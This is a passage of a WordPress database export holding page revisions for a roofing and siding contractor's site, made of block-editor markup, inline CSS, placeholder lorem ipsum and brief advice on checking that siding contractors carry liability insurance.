class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"baa4317a-0da5-4ce3-9276-68d750099fbb\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-baa4317a-0da5-4ce3-9276-68d750099fbb\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"8b199e02-8b7a-4370-bd4d-3421bc4a7624\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"44cd821a-9dd0-4ac7-9c82-f555d98e54fe\"} -->\n<style type=\"text/css\"> .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"7ca68574-412c-4830-b622-e36d4f00ea49\"} -->\n<style type=\"text/css\"> .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7ca68574-412c-4830-b622-e36d4f00ea49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"24b580d3-82a8-4aa7-832b-5128d624b5e1\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-24b580d3-82a8-4aa7-832b-5128d624b5e1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Siding','','inherit','closed','closed','','215-autosave-v1','','','2022-08-23 18:48:50','2022-08-23 18:48:50','',215,'https://cteisys.com/?p=453',0,'revision','',0),(454,1,'2022-08-23 18:49:02','2022-08-23 18:49:02','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"30125cb2-5b1a-4355-96e3-c2a9ea89f965\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"afa0e568-68f4-4025-b8bc-c877ecbbb129\"} -->\n<style type=\"text/css\"> .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-afa0e568-68f4-4025-b8bc-c877ecbbb129 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"6a05bb6a-276d-4790-b47d-858d6f80f6d3\"} -->\n<style type=\"text/css\"> .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a05bb6a-276d-4790-b47d-858d6f80f6d3\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"49f6ee6c-504d-4d60-938f-35ad6223261c\"} -->\n<style type=\"text/css\"> .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-49f6ee6c-504d-4d60-938f-35ad6223261c\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2f8e1399-a394-4dc5-afcc-503ec3adb6af\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2f8e1399-a394-4dc5-afcc-503ec3adb6af\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Dunrite Roof And siding</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph -->\n<p>Few things add curb appeal better than new, clean siding. With so many siding contractors out there to choose from getting started on your project can be a little overwhelming, so let us help!<br><br>Good siding contractors will be able to help you pick the right kind of siding for your home based on budget, climate, design and more! This will make sure that you get the most out of your new or renovated siding.<br><br>Just a note: when going with a new siding contractor be sure they have adequate liability insurance. Anyone with a truck and a ladder can claim to be a siding contractor, so there are plenty of uninsured one-man operations out there. You can never be too careful for a siding installation job that will require the siding contractors to climb on your roof!</p>\n<!-- /wp:paragraph -->\n\n<!-- 